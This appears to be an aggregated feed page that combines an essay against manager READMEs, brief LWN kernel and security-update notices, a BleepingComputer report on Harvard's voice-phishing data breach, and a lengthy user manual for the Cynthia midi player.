Several years ago, I published a critique of manager READMEs that succeeded in stirring up a lot of feelings, pro and con. I’d like to believe it prompted some people to reconsider whether these are actually effective tools.
Today, I want to revisit this. Not to encourage you to write a manager README, but to suggest other ways forward that I have learned in the years since writing the first post.
The Problem
When you become a senior manager or an executive, you face new challenges. Your job involves directing work across many people with different approaches, styles, and opinions. Left to their own devices, each person will develop a slightly different way of communicating with you, one that works for them and that they believe works for you.
With a broad scope of work to oversee, you need to quickly grasp what matters and should be shared upward, outward, and down into different parts of your organization. Now, at most companies, this is a known problem and inevitably someone has already tried to solve it by means of standardized tooling and reporting. Everyone uses Jira for a reason and it’s not that Jira is the best tool ever, but it is malleable to many types of standardization. Companies implement OKR tools and Tableau dashboards, they institute various program management processes, they run quarterly business reviews, and all of these are done in the name of standardizing the information that is passed upward and outward so that people can make better decisions.
Unfortunately, this is typically the lowest common denominator of usefulness to any senior manager. Reporting generated in this way obscures as much as it reveals, and it rarely addresses the things that you really care about¹. So senior managers need other mechanisms for imparting what they want to hear about and see. The README can sometimes be an attempt to impart that cultural overlay: a way of saying, “I care about X, and want you to focus on that when you communicate to me; I don’t care much about Y and Z, and by the way, it’s best if you communicate with me in these ways.”
I remain steadfast that this is not a good approach. It creates a focus on you as the person to be managed up to. Your personality must be accommodated, your preferences honored. I get the desire for this, and I’m certainly not immune to being managed up to, but my preference is to avoid major blind spots. I want to hear what I care about, yes, but I don’t want to live in an information bubble either.
READMEs are also rather lazy. There’s a kernel of truth in their purpose: we want people to focus certain types of communication on what we believe is most valuable. However, doing it in the form of a general README isn’t actually the most effective approach.
So if not READMEs, what then?
The Solution: Appropriate Templates and Ceremonies
Instead of one doc that attempts to communicate all of your preferences and warts and creates a you-focused mindset, it’s time to level up and recognize that a big part of the job of senior/executive management is setting standards for doing certain types of work. The best way to set those standards, in my experience, is lightweight templates and ceremonies for information sharing, discussion, and decision-making.
I think that every good senior manager should have some toolkit of these. You aren’t just going to operate against the lowest common denominator of pre-existing reports and processes in your company; you have to establish a few processes that exist to show what you care about and where you want the organization to focus. One of mine is Wins and Challenges (discussed in my recent book), which I’ve brought from startups to giant teams and everything in between. Is it extra work on top of whatever people might be doing in Jira or other tools? Possibly. Does it create far more valuable conversation across my leadership team than those tools? Yes. Does it help me specifically understand things and do my job better? Absolutely.
There is a very lightweight template to follow for my Wins and Challenges, and the process details are owned by the team gathering the information (although I specify opinions about how it should be done, I only check the outcomes). I find that the best templates and processes are lightweight in a way that they show what information should be collected but don’t dictate exactly the process to collect that information.
Developing templates that expose the right useful information is hard. You will both over-do and under-do this as you’re figuring it out, whether it’s your first time in the job, you’ve moved to a different company or team, or your team has just evolved past the usefulness of the old methods. My advice is to start simple and add on new details or processes only when it’s clear you have a widespread gap. A good rhythm for a new job/team is to learn for 90 days, then introduce what you need, and evolve from there with enough time to learn from each iteration (usually, 1-2 quarters).
Don’t Try To Template/Processify Everything
I recently asked an experienced CPO about good product processes, and what they looked like from his perspective. One piece of advice was that not everything should have a fixed process or template. When you need to leave room for discussion, it’s often best to limit the structure; a walkthrough of a prototype might be better done as an open-ended exploration and discussion rather than a formal set of steps.
It’s important not to give in to the temptation (or external pressure) to create processes for everything. I personally do not have a fixed format for my 1-1s, and dislike even the expectation of coming with a set of written and shared topics. I don’t want to feel rushed to finish everything on an agenda, and the temptation to immediately jump to conclusions about a topic based on an agenda item often increases miscommunication. Sometimes there’s a need to pre-read and prepare, but sometimes we just need to talk and see where the exploration of current top-of-mind concerns and information takes us.
So, senior leaders, you can tell people how you want them to work with you, but don’t do it via the crude mechanism of a manager README. Drive clarity through templates and processes where needed, resist the urge to create them everywhere, and lead your organization by showing them where to spend their time and focus as a collective good, not just good for you.
¹ Think of it this way: if you could easily see the problems via the pre-existing dashboards, they’d already be on their way to being solved. Dashboards are like alerts and tests in this way: they tend to catch what you know could go wrong, but rarely the surprise problems that lead to big incidents. Necessary, but insufficient.
Three stable kernel updates, two french hens, ...
Linux Weekly News
lwn.net
2025-11-24 14:11:01
Greg Kroah-Hartman has announced the release of the 6.17.9, 6.12.59, and 6.6.117 stable kernels. As usual, he advises users of stable kernels to upgrade.
Harvard University discloses data breach affecting alumni, donors
Bleeping Computer
www.bleepingcomputer.com
2025-11-24 14:06:36
Harvard University disclosed over the weekend that its Alumni Affairs and Development systems were compromised in a voice phishing attack, exposing the personal information of students, alumni, donors, staff, and faculty members.
The exposed data includes email addresses, telephone numbers, home and business addresses, event attendance records, donation details, and "biographical information pertaining to University fundraising and alumni engagement activities."
However, according to Klara Jelinkova, Harvard's Vice President and University Chief Information Officer, and Jim Husson, the university's Vice President for Alumni Affairs and Development, the compromised IT systems didn't contain Social Security numbers, passwords, payment card information, or financial info.
Harvard officials believe that the following groups and individuals had their data exposed in the data breach:
Alumni
Alumni spouses, partners, and widows/widowers of alumni
Donors to Harvard University
Parents of current and former students
Some current students
Some faculty and staff
The private Ivy League research university is working with law enforcement and third-party cybersecurity experts to investigate the incident, and it has sent data breach notifications on November 22nd to individuals whose information may have been accessed in the attack.
"On Tuesday, November 18, 2025, Harvard University discovered that information systems used by Alumni Affairs and Development were accessed by an unauthorized party as a result of a phone-based phishing attack,"
the letters warn
.
"The University acted immediately to remove the attacker's access to our systems and prevent further unauthorized access. We are writing to make you aware that information about you may have been accessed and so you can be alert for any unusual communications that purport to come from the University."
The university also urged potentially affected individuals to be suspicious of calls, text messages, or emails claiming to be from the university, particularly those requesting password resets or sensitive information (e.g., passwords, Social Security numbers, or bank information).
A Harvard spokesperson was not immediately available for comment when contacted by BleepingComputer earlier today.
In mid-October, Harvard University also told BleepingComputer that it was investigating another data breach after the Clop ransomware gang added it to its data-leak extortion site, claiming it had breached the school's systems using a zero-day vulnerability in Oracle's E-Business Suite servers.
Two other Ivy League schools, Princeton University and the University of Pennsylvania, disclosed data breaches earlier this month, both confirming that attackers gained access to donors' information.
Security updates for Monday
Linux Weekly News
lwn.net
2025-11-24 14:05:35
Security updates have been issued by Fedora (calibre, chromium, cri-o1.32, cri-o1.33, cri-o1.34, dotnet10.0, dovecot, gnutls, gopass, gopass-hibp, gopass-jsonapi, kubernetes1.31, kubernetes1.32, kubernetes1.33, kubernetes1.34, and linux-firmware), Mageia (ffmpeg, kernel, kmod-xtables-addons & km...
Reliably play midi music files from a folder or ".m3u" playlist. Adjust playback speed, volume and output device on-the-fly during playback. A large playback progress bar makes jumping forward and backward in time a breeze with just a single click or tap. Supports ".mid", ".midi" and ".rmi" files in format 0 (single track) and format 1 (multi-track). Comes complete with 25 sample midis ready to play.
Cynthia playing through her sample midi music
Features
Dual play systems - Play Folder and Play List
Comes with 25 built-in sample midis on a virtual disk
Elapsed, Remaining and Total time readouts
Device Status, Device Count, Msgs/sec and Data Rate readouts
Native ".m3u" playlist support (copy, paste, open, save, build)
Drag and drop midi files to play/add to playlist
Play Modes: Once, Repeat One, Repeat All, All Once, Random
Standard Play Speed Range: 50% to 200% (0.5x to 2x)
Extended Play Speed Range: 10% to 1,000% (0.1x to 10x)
Intro Mode: Play first 2s, 5s, 10s or 30s of midi
Rewind/Fast Forward by: 1s, 2s, 5s, 10s or 30s
Play on Start option - playback commences on app start
Always on Midi option - maintain connection to midi device(s) for instant playback
Auto Fade In - eliminate loud or abrupt notes during rewind, fast forward or reposition operations
Playback Progress bar - click to reposition/jump backward or forward in time
Volume control with volume boost (up to 200%)
"
Mixer" link - display Windows "Volume Mixer" app
Play ".mid", ".midi" and ".rmi" midi files in 0 and 1 formats
Scrolling lyrics viewer
Detailed midi information panel
Tracks Panel: Realtime track data indicators, display flat or shaded, with mute all, unmute all, and mute individual track options
Channels Panel: Realtime channel output volume indicators with peak level hold and variable hold time, display flat or shaded, unmute all, mute all, and mute individual channel options
Mixer: Adjust individual channel volume levels from 0% to 200%
Option: Number channels 0-15 or 1-16
Notes Panel: 128 realtime note usage indicators with variable hold time, 8-12 notes per line, labels as letters or numbers, display flat or shaded, unmute all, mute all, and mute individual note options
Option: Number notes 0-127 or 1-128
Piano Panel: View realtime piano keystrokes on a 128, 88, 76, 61, 54, 49 or 37 key keyboard
Piano Keystroke Illumination: Off, Flat, Shade Up, Shade Down, Subtle, Subtle 2, Leading Edge, and Leading Edge 2
Piano: Mark middle C key, C + F keys, or all white keys
Volume Bars: Realtime average volume and bass volume levels (left and right vertical)
Transpose option: Shift all notes up/down music scale
Use an Xbox Controller to control Cynthia's main functions: Playback speed, volume, song position, display panels, song file navigation, jump to start of song, toggle fullscreen mode, etc
Large list capacity for handling thousands of midi files
Switch between up to 10 midi playback devices
Supports playback through a single midi device, or multiple simultaneous midi devices
Multi-Device Options (per midi device): Time Shift - adjust playback timing to compensate for midi device lag from -500 ms to +500 ms, Device Volume - adjust output volume from 0% to 200%, Output Channels - select which midi channels to play through the device
Automatic Midi Device(s) Resync - detects OS changes in midi device ordering/names and corrects in realtime
Custom built midi playback engine for high playback stability
Automatic compact mode for display on small/low resolution screens
Simple and easy to use
Options Window - Easily change app color, font, and settings
Portable
Smart Source Code (Borland Delphi 3 and Lazarus 2)
Realtime display panels Visual (Tracks, Channels, and Notes), Piano and Bars visible
Cynthia in her traditional view - Navigation, Information and Settings panels visible
Easily adjust channel volumes on-the-fly with the integrated mixer - hover over/tap the Channels panel to show/edit
Cynthia in the "Deep Orange 2" color scheme (Options > Color) and "Swell" animated background scheme (Options > Background), with Compact mode on (Options > Settings > Compact)
Running Cynthia for the first time
Several sample midis come built in. When starting Cynthia for the first time, these sample midis are listed in the "Play Folder" panel, and playback is automatic.
At any point during playback, you may select another midi from the list. Playback seamlessly switches to the selected midi.
Cynthia supports realtime changes to settings during playback. This means you may adjust the Playback Mode, Playback Device, Volume and Speed without having to stop/restart playback.
Main toolbar links and their function
The main toolbar is located near the top of Cynthia's window. From left to right, it has the following links:
Nav - Toggle display of navigation panel
Play Folder - Show the "Play Folder" panel to play midis from a folder
Play List - Show the "Play List" panel to play midis from a playlist
Prev - Play previous midi file in list
Rewind - Shift playback position back several seconds
Stop - Stop playback
Play - Toggle playback: when playing (flashing), playback stops; when stopped (static), playback starts
Fast Forward - Shift playback position forward several seconds
Next - Play next midi file in list
Menu - Show menu
Mixer - Show the Windows Mixer app
Options - Show the Options window, to change Cynthia's appearance
Help - Show (from rightmost column) or hide built-in help
How to play a list of midis in a folder
From the main toolbar click the "Play Folder" link (top left) to display the "Play Folder" panel.
With Play Folder, there is no need for a playlist or setup. Just navigate to the folder in question and instantly play the midis within.
Double click the "Home" entry at the top of the list (scroll up if not visible). The list will refresh with the names of your hard drives, pen sticks and other local storage devices. Double click a drive, then the subsequent folder(s), down to the one that you want to play.
The list will update. Double click a specific midi to begin playback, or click the "Play" link.
Toolbar Links
Refresh - Refresh the playback list
Fav - Show the "Favourites" window. Use this handy window to maintain a list of your favourite folders for quick access.
Back - Go to the previous folder in navigation history
Forward - Go to the next folder in navigation history
Tips:
There is no need to stop playback before switching to another folder. Double click the new folder and wait several seconds for Cynthia to automatically recommence playback.
The current folder will be remembered when Cynthia is restarted.
How to use a playlist to play a selection of midis
The standard ".m3u" playlist format is supported. This is a plain text file that contains the length of the midi in seconds, a title, and the location of each midi.
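In the common extended ".m3u" form, that information is carried on "#EXTINF" lines. As a rough illustration (the titles, lengths and file locations below are made-up examples, not files that ship with Cynthia), a small playlist might look like:

    #EXTM3U
    #EXTINF:95,Greensleeves
    midis\greensleeves.mid
    #EXTINF:210,Moonlight Sonata (1st movement)
    classical\moonlight_sonata.mid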
Cynthia supports midi playback from local storage devices, such as hard disks, pen sticks etc. Internet URLs are not supported.
If you already have a playlist in the m3u format saved on your disk, you can open it in Cynthia for playback. From the main toolbar click the "Play List" link (top left) to show the Play List panel. An additional toolbar appears. Click the "Open" link (if shown) or "Edit > Open". From the Open window, navigate to your playlist, select it and click the "Open" button.
The contents of your playlist will load inside the Play List panel. Click the "Play" link to begin playback.
How to make a playlist
There are several ways a playlist can be constructed. The first method is the easiest. From your computer's file explorer ("File Explorer" in Windows and "Files" in Ubuntu) navigate to the folder of midis. Highlight one or more midi files inside the folder, drag the selection onto Cynthia and let go of the mouse button. The "Play List" panel updates and displays the dropped midi files appended to the list. Repeat this process for as many midi files as required.
At any time you may save the playlist. From the Play List toolbar, click the "Save As" link (if shown) or "Edit > Save As...". Type a name in the Save window and click the "Save" button to save the playlist.
It is worth noting that each time Cynthia saves your playlist to file, the midi files referenced inside it have their names adjusted automatically to work with the specific save location of the playlist.
Most midi filenames in a playlist are relative, as they do not have the full drive, folder and filename, but rather a partial folder structure and the midi's name. This is to permit the movement of the midis and the playlist from one location to another without the need for the playlist to be specifically rewritten.
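As a hypothetical illustration (the folder and file names are made up): if the playlist is saved as "C:\Music\mymidis.m3u" and contains the relative entry "classical\moonlight_sonata.mid", that entry is presumably resolved against the playlist's own folder - the usual ".m3u" convention - giving "C:\Music\classical\moonlight_sonata.mid". Move the whole "Music" folder to another drive and the entry remains valid, because it is still resolved relative to wherever the playlist now lives.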
If you are curious about what the playlist format looks like, click the "Copy All" link (if shown) or "Edit > Copy All" to copy the entire playlist to the Clipboard. Note that Cynthia will use a full filename for each listed midi file, since the Clipboard is not tied to a disk location that relative filenames could be resolved against. You may paste it into any text editor to view, modify, or rearrange the order of the midi files listed.
To paste an altered playlist back into Cynthia, click the "Replace" link (if shown) or "Edit > Replace". The Play List panel will update.
Cynthia has support for extended playlists. Note! A large playlist of 100,000+ midi files will use about 102MB of RAM and require a second or two to apply midi filename adjustments.
Support for playlist filtering is provided. An example: You may instruct Cynthia to list only ".mid" files by deselecting ".midi" and ".rmi" options from the "File Types" option panel (right column). The playlist itself remains unchanged - how Cynthia uses it changes.
Toolbar Links
Edit - Show edit menu
New - Prompt to clear playlist
Open - Open a playlist from file
Save As - Save playlist to file
Cut - Cut selected playlist item to Clipboard
Copy - Copy selected playlist item to Clipboard
Copy All - Copy entire playlist to Clipboard
Paste - Add Clipboard playlist to end of current playlist
Replace - Replace current playlist with Clipboard playlist
Undo - Undo last change to playlist
Tips:
The current playlist is remembered for next time Cynthia is started.
To show or hide the above toolbar links, tick or untick the "Edit > Show Links on Toolbar" option. Unticking the option hides all links except "Edit" and "Paste".
Which playback method to use? Play Folder or Play List?
Whether you love simplicity itself, wishing only to play midi files directly from your hard drive folders as-is, or you're a playlist fan, rest assured: switching between these two very different playback systems is as easy as a single click on either the "Play Folder" or "Play List" link.
Whilst the Play Folder method is limited to playing only the files contained in the currently selected folder, there is zero setup, no list to be built, and playback can start without hassle.
The Play List method, on the other hand, allows for a far more in-depth, custom playback experience. It supports the playback of midis across multiple disk drives and folders, in any assembled order.
Additionally, Cynthia's large-capacity list can easily handle a very large playlist. For example, a playlist of 10,000+ midis is just fine.
And switching between these two playback methods can be done during playback without issue.
Tip:
The playback options File Types, Playback Mode, Playback Device, Speed and Volume are shared between both playback systems, and do not change or require adjustment after a switch.
Option: Playback Mode
Located bottom of left column.
Playback mode (bottom left) determines how Cynthia plays the list of midis in the Play Folder or Play List panel (left column).
Once
Play currently selected midi to the end, and stop playback.
Repeat One
Repeat the currently selected midi without stopping playback.
Repeat All
Play each midi in turn, working down the list (left column), then restart from the top. Playback initially starts at currently selected midi.
All Once
Each midi in the list is played working downward through the list. Playback stops at the end of the last midi.
Random
Continuously play a midi, selecting each new one randomly from the list.
Option: File Types
Located towards bottom of right column.
There are three midi file types supported: ".mid", ".midi" and ".rmi". The first two are identical file formats, only the file extension differs. The third format, ".rmi", is slightly different and contains additional multimedia information for Microsoft Windows.
By default all three file types are selected (lit black). In this state, all playable midi files are listed in the Play Folder and Play List panels.
To restrict the file types to be played back, click the file type to deselect it. The list of midis (left column) updates to reflect the change.
If all three options are deselected, Cynthia interprets this as if all three were selected.
Option: Playback Device
Located towards bottom of right column.
By default all midi playback is sent to the Windows Midi Mapper system - the default Windows midi note handler.
If you have more than one midi device installed on your computer, Cynthia can redirect the midi notes to that device instead.
Traditionally, a midi device was considered to be hardware. Now, with the advent of powerful computer hardware, software can act as virtual hardware, allowing advanced features to be added to your computer without the need for hardware upgrades or physical adjustment.
A midi software driver can support a soundfont, which can greatly enhance the playback quality of a midi through its support for large, high-quality instrumental sound libraries.
To change the playback device, select a number in the playback device control (bottom right). Up to ten devices (1-10) are supported. "Map" is the Windows Midi Mapper. Selecting a dash will cause playback to stop producing audible sound (no device selected for sound output). In this case, the last usable (numbered) midi device will be automatically selected after a short time delay, recommencing audible playback without the need for user input.
Cynthia supports realtime device switching during playback. A small, momentary interruption to playback may occur during a device change. The name of the device in use by Cynthia is listed in the playback device control (bottom right), for example as "Playback Device: Midi Mapper". In later versions of Microsoft Windows the Midi Mapper was discontinued - in this case, Cynthia uses the first installed midi device.
It is worth noting that using another device may require a separate adjustment to that device's own volume control - some devices have one, and some do not. If it does have a volume control, it is most likely accessible via the Windows "Volume Mixer" application. Click the "Mixer" link from the top toolbar to display the application and adjust the volume control of your device accordingly.
Option: Speed
Located towards bottom of right column.
By default, Cynthia plays back a midi at normal speed (100%). Drag the slider to the right to increase the playback speed up to a maximum speed of 1,000% or 10x normal speed.
To slow down playback speed, drag the slider to the left. A value less than 100% slows playback to less than normal speed. The slider can go as low as 10% or 1/10th normal playback speed.
Playback speed may be adjusted at any point during playback. All changes take place in realtime. An auto-fade in feature momentarily quietens playback to avoid any sudden or unexpected notes.
Option: Volume
Located at bottom of right column.
For maximum compatibility between different operating systems and device types (hardware and software) and their capabilities, Cynthia employs a multi-layer volume control system which adjusts both hardware and midi note volumes.
To adjust playback volume, position the slider to the right to increase the volume and to the left to decrease it.
An increase above 100% boosts the midi note volume, making low-level, hard-to-hear midis more discernible.
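As a rough illustration of the idea only (a minimal sketch in Python, not Cynthia's actual Delphi source), boosting midi volume above 100% can be thought of as scaling each note-on velocity and clamping the result to the midi maximum of 127:

    def scale_velocity(velocity: int, volume_percent: int) -> int:
        """Scale a midi note-on velocity (0-127) by a volume setting given in percent."""
        scaled = round(velocity * volume_percent / 100)
        return max(0, min(127, scaled))  # clamp to the legal midi velocity range

    # Example: a quiet note of velocity 40 at the 200% boost setting becomes 80;
    # a loud note of velocity 100 is clamped to 127.
    print(scale_velocity(40, 200))   # -> 80
    print(scale_velocity(100, 200))  # -> 127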
Option: Playback Progress
Adjust playback position with a single click or tap. Additionally, hovering the mouse cursor over the Playback Progress bar displays a vertical marker for the new playback time and position. Click to apply the new position. Playback will shift to that position, and an automatic fade-in eases the playback volume back to avoid sudden clicks, pops or abrupt notes.
Use keyboard arrow keys to progressively move forward or backward through the midi. A vertical marker will display.
Not currently playing? Click in the Playback Progress bar to commence playback at that position.
Lyrics
Synchronised lyric display is supported for midis with lyrics.
To enable lyrics, from the main toolbar click the "Menu" link and tick "Show Lyrics".
When included within a midi, lyrics are displayed inside the Playback Progress bar (bottom of Cynthia) as "Playback Progress - Lyrics:" with several words or part words visible at any one time.
A midi without lyrics will display "Playback Progress".
If hyphenated lyrics are required in order to highlight the pauses between part-words, from the main toolbar click the "Menu" link and tick "Hyphenate Lyrics".
Always on Midi
There can sometimes be a short, noticeable delay when playback first commences. This delay is the preparation time Cynthia needs to ready the midi device for playback.
There is no delay when switching between midis during playback, as Cynthia remains connected to the midi device. By default, after a short period of no playback (5 seconds or more), the midi device is switched offline, and a short delay will occur when playback is next started.
To avoid this delay, the "Always on Midi" option may be used to keep a midi device online, even when Cynthia is not playing. From the main toolbar click the "Menu" option and tick the "Always on Midi" option.
Tip:
You can always tell whether the midi device is online from the "Midi Information" panel on the right. Look for the item called "Device" in the "Technical list". It will read either "Online" or "Offline".
What midi formats are supported?
Midis come in various format types. The simplest is format 0, a single-track format that stores all of its tempo (speed), note and command data on a single, mixed track.
A format 1 midi, on the other hand, uses a dedicated master track (the first track) to store all of the tempo (speed) commands for the entire midi. Notes and commands are stored separately on additional, multiple tracks.
Cynthia supports both format 0 and format 1 midis with the file extensions ".mid", ".midi" and ".rmi".
A third type, format 2, also exists. This format is not supported by Cynthia. In addition, Cynthia does not support system exclusive messages. These messages, which typically relate to manufacturer-specific equipment, are ignored.
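For the curious, the format number is stored at the start of a standard midi file in its "MThd" header chunk, so it can be inspected with a few lines of code. Here is a minimal sketch in Python (illustrative only - not Cynthia's own Delphi code, and the filename is a made-up example; ".rmi" files wrap this same data inside a RIFF container, so there the header sits a little further into the file):

    import struct

    def midi_format(path):
        """Return the format number (0, 1 or 2) from a midi file's MThd header."""
        with open(path, "rb") as f:
            if f.read(4) != b"MThd":                     # standard midi files start with "MThd"
                raise ValueError("not a standard midi file")
            (length,) = struct.unpack(">I", f.read(4))   # header length, normally 6
            fmt, ntracks, division = struct.unpack(">HHH", f.read(6))
            return fmt

    print(midi_format("greensleeves.mid"))  # e.g. 0 (single track) or 1 (multi-track)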
Using an Xbox Controller to control Cynthia
Cynthia must be set up to use an Xbox Controller. From the top toolbar select "Menu > Xbox Controller" and select the "Active Only" or "Active and Inactive" option. Pair an Xbox Controller with your computer (if not already done). Cynthia automatically detects and uses active Xbox Controllers. More than one controller can be used at the same time.
1. Left joystick - left/right to adjust volume, push down to toggle between Play Folder and Play List modes
2. D-pad - left/right to switch midi playback device, up/down to switch between songs in navigation panel
3. View button - Go to beginning of song
4. Share button - Not used
5. Menu button - Toggle through playback modes: Once, Repeat One, Repeat All, All Once, and Random
6. Right joystick - left/right to change song playback position, push down to toggle full screen mode
7. Left bumper (top) - toggle display of navigation and piano panels
8. Right bumper (top) - toggle display of midi information and tracks, channels, and notes combination panels
9. Left trigger (bottom) - reduce playback speed
10. Right trigger (bottom) - increase playback speed
11. X button - reset playback speed to 100%
12. Y button - reset volume to 100%
13. B button - start/stop playback
14. A button - select folder in navigation panel (when in Play Folder mode)
Change the coloring of the app's GUI
From the top toolbar click "Options" or the app menu "... > Options" (top right of window). An "Options" window will display. Select the "Color" tab to show the list of color schemes.
The "Color Schemes" list is split into three sections:
1. Built-In color schemes - read only/use as is
2. Custom color schemes - user customisable and labelled Custom 1-10
3. Saved color schemes - user customisable and saved as file(s) on disk
There are 160+ built-in color schemes to choose from. Simply select a color scheme to apply in realtime. For instance, Aqua Marine. Watch as the app's GUI changes color instantly - no need for an additional load, apply, or set.
A Blaiz Enterprises' color scheme (*.bcs) is at its core a list of twenty colors, responsible for coloring most aspects of the app's GUI; some specialised colors are derived automatically from these. Two colors are for the frame, nine are for important areas (Title colors), and nine more are for common zones (Standard colors).
Each built-in color scheme has its own unique set of colors. A custom color scheme allows the colors to be customised. To create a custom color scheme, scroll down the list to the section titled "Custom". Here you'll find ten custom color scheme slots - each fully customisable in realtime without any need to be named, saved or applied. Tap or click on a slot to start - for example slot 1 - "Custom 1".
On the right a series of editable color palettes will appear. Click a palette to display the color dialog window. Adjust color as desired and click OK when done. Alternatively, click and drag your mouse cursor/fingertip from the color palette to acquire color from your computer screen in realtime. App GUI continuously updates to reflect changes in color. All changes are automatically saved.
Give your new color scheme a name
Want your shiny new color scheme to have its own name? Easy. From the color schemes list - click "Options > Color" to display the dialog - scroll down to the "Custom" section, select your custom color scheme, and click "Menu > Save As...". Type a name and click the "Save" button. Your color scheme is saved to disk and listed under the "Saved" section of the color schemes list - next section down.
Any color scheme can be saved to disk, and then edited. For instance, you can select one of the built-in color schemes, such as Aqua Marine, and save it to disk, then customise as desired.
How to use your named color scheme
Click "Options > Color" to show the color schemes list. Scroll down to the last section named "Saved". This section presents a list of all your saved color schemes in one central location. Select a scheme to use.
Can I edit my saved color scheme without having to re-save it/load it etc?
Yes. Any saved color scheme can be customised without fuss. Click "Options > Color" and scroll down to the section named "Saved", click the color scheme you wish to edit, and adjust the color(s) as desired. All changes are saved automatically back to the file on disk, without any need to explicitly save.
What is a background scheme
A background scheme is a static or animated image tiled across the background layer of the app. The app's GUI components - toolbars, tool images, buttons, text etc. - sit above this layer and merge into it. There are 60 built-in background schemes, based on several images with different presets, such as horizontal and vertical scroll speeds, fade in and out rates, and wobble levels. These functions allow a static image to give movement to the app. While some background schemes are specially set up for animation, others are not.
The background image can be rendered in full color, or shade-shifted toward greyscale, or shade-shifted toward the app's current highlight color. One slider, Colorise, controls this tri-function.
A background scheme supports a maximum image color depth of 32 bits in RGBA format - 8 bit red, green, blue, and alpha channels - for instance a transparent PNG image.
Note:
An animated background scheme can operate at frame rates of up to 20 fps (frames per second), which means the entire GUI of the app is repainted in full, 20 times per second, like a video, and therefore can consume quite a bit of CPU power, especially at high resolutions. It is recommended a modern, powerful machine be used for high frame rates/resolutions in order to maintain smooth operation of the GUI.
Sliders and their meanings:
Strength (0..255):
Determines how much of the background image is seen/made visible. A low value renders the background subtly beneath the GUI, whereas a high value, 100-255, renders it boldly. A value above 100 is disabled by default. To enable, click "Options > Settings" and deselect "Display > Safe Background". A value over 100 may overpower the GUI making it hard to navigate or operate. If this becomes the case, press the "F2" key, and then the Enter key to confirm restoration of the app's default settings.
Colorise (-100..100):
Set the color rendering method. A value of 100 renders the background image in full color, a value of 0 in greyscale, and a value of -100 in the app's current highlight color.
Speed (0..20):
Paint speed in frames per second. 0 is static - the background scheme only repaints when required. This is the least stressful option. A value of 1-20 sets a constant repaint cycle of 1-20 fps (frames per second).
Horizontal Scroll/Vertical Scroll (-100..100):
Moves background image left/up (minus value) or right/down (plus value) by X pixels. A value of zero turns movement off.
Horizontal Wobble/Vertical Wobble (0..300):
Applies a wobble factor to the above Horizontal Scroll/Vertical Scroll movement(s).
Fade In/Out (0..50):
Cycles through a high-to-low-to-high intensity flow, gradually fading the background image from view, then back again, in a continuous cycle. Use a low value for a slow cycle, and a high value for a fast cycle.
Fade Wobble (0..200):
Applies a wobble factor to the Fade In/Out flow cycle above.
Can I customise a background scheme/background image
Yes you can. There are 10 custom background scheme slots. Click "Options > Background" and scroll down to the section named "Custom". For instance, click on "Custom 1". A sub-toolbar will display in the right column at the top. From there, you can paste in an image from Clipboard - click "Paste", or open an image from file - click "File".
For best visual results, your image should be a similar size to the app's overall area, and be prepped for tiling - that is, have its right and bottom edges modified so that its colors/pixels seamlessly wrap back round to the opposing edge (right-to-left and top-to-bottom). You can use a tile creation app or a good quality graphics app to accomplish this, or use our "Blend It" app to prep your image.
Without this, the tiled image may show abrupt, unwanted lines of horizontal/vertical color where opposing edges meet, and be visually jarring.
Adjust the sliders as required to accomplish animation and visual effects. All changes to the image and sliders are saved in realtime.
How do I change the frame style, size and sparkle strength/effect?
The frame on our apps has a long history reaching back to the late 1990s, when it first adorned our FastCards and PowerCards (still/animated electronic musical greeting cards).
In the context of an app, they primarily serve as a large, easy-grip area for resizing the app's overall size, and a touch of decoration to boot.
A frame can be made wide or narrow as required. The modern app has a typical frame width of 7 px in a plain style, so as not to distract or occupy excessive screen real estate.
Furthermore, a frame may render with an optional, randomised sparkle effect, with a range of 0 (no sparkle) to 20 (heavy sparkle).
Click "Options > Frame" to edit the app's current frame settings. A list of 50 built-in frames is available to choose from, ranging from Antique to Traditional 5.
Toward the bottom of the window are two sliders to adjust the frame's Sparkle (strength) and Size (width in pixels). A frame can be sized from 0 px (no frame) up to a wide frame of 72 px. All changes update in realtime.
Automatic zoom and scaling of app text and images on high resolution displays
Click "Options > Font" to display zoom and font specific settings. By default, the app is set to automatic zoom, which means it will scale up its text and images if the monitor it's displayed on is above 2K in resolution.
Why scale text and images at all? What is special about 4K and 8K monitors? At first glance, the significant difference between standard 2K resolution and the much higher 4K and 8K resolutions may not be obvious.
But high resolution monitors, such as 4K and 8K displays, have far more pixels (colored dots) per inch on screen than previous generations of monitors; that is, the screen size may be the same, but more dots are packed into the same area. Consequently, an app without scaling abilities may appear small or even blurred on these monitors. That's because as new monitors and TVs gain ever greater resolutions, statically sized apps shrink in size or fail to compensate. This is why a modern app must be able to scale up to match the appropriate resolution.
Here is a comparison of common display resolutions:
2K = 1920w x 1080h = 2,073,600 pixels
4K = 3840w x 2160h = 8,294,400 pixels
8K = 7680w x 4320h = 33,177,600 pixels
A 4K (ultra high definition) monitor uses four times (4x) as many pixels as its 2K (full high definition) counterpart. A statically built app without scaling would shrink to 50% of its size, making it difficult to use. An operating system may attempt to counter this by scaling it up using pixel stretching - very much like zooming up a photo - but unfortunately this tends to blur the appearance of the app.
The same app on an 8K monitor would suffer even greater shrinkage, rendering at only a quarter (25%) of its original size, or scaling with significant blurring.
This app has a built-in zoom mode, which multiplies the width and height of its text and images by a factor of 2, 3, or 4, dependent on the resolution of the display. This does away with the need for the operating system to stretch/scale its pixels.
On a 2K monitor there is no need to scale, as this is the app's intended resolution. On a 4K monitor the app switches to a zoom factor of 200% (2x), upscaling text, images and the main window's dimensions accordingly, and 400% (4x) on an 8K monitor. The end result is an app that appears appropriately sized across different monitor resolutions.
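A minimal sketch of that decision in Python (illustrative only - the width thresholds are inferred from the description above, not taken from Cynthia's source):

    def auto_zoom_percent(screen_width_px: int) -> int:
        """Pick a zoom factor from the horizontal resolution, per the scheme described above."""
        if screen_width_px >= 7680:   # 8K-class display
            return 400
        if screen_width_px >= 3840:   # 4K-class display
            return 200
        return 100                    # 2K or lower - the app's intended resolution

    print(auto_zoom_percent(1920))  # -> 100
    print(auto_zoom_percent(3840))  # -> 200
    print(auto_zoom_percent(7680))  # -> 400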
You can override this automatic zoom function and set your own zoom value of 100%, 200%, 300%, or 400% if desired - an option that may be useful with a custom display resolution and/or a multi-monitor environment.
Note:
Setting the zoom value to 300% or above on a 2K monitor may render the app so large as to make it unusable. If this occurs, you can press the "F2" key at anytime to restore the app's default settings.
Change app text size
The text size (font size) can be set between 6 and 24. Click "Options > Font" and choose a size option. Any change updates the app text in realtime.
In some instances, the app may display slightly larger or smaller text in special areas, however this text is directly scaled from the size set.
By default the app uses a size of 10.
Note:
Not all sizes are supported by all fonts. On Ubuntu for instance, a large font size for Arial can cause text to appear weird or slightly off. If this occurs, try reducing the font size a tad, or alternatively select another font (font name).
Change app font
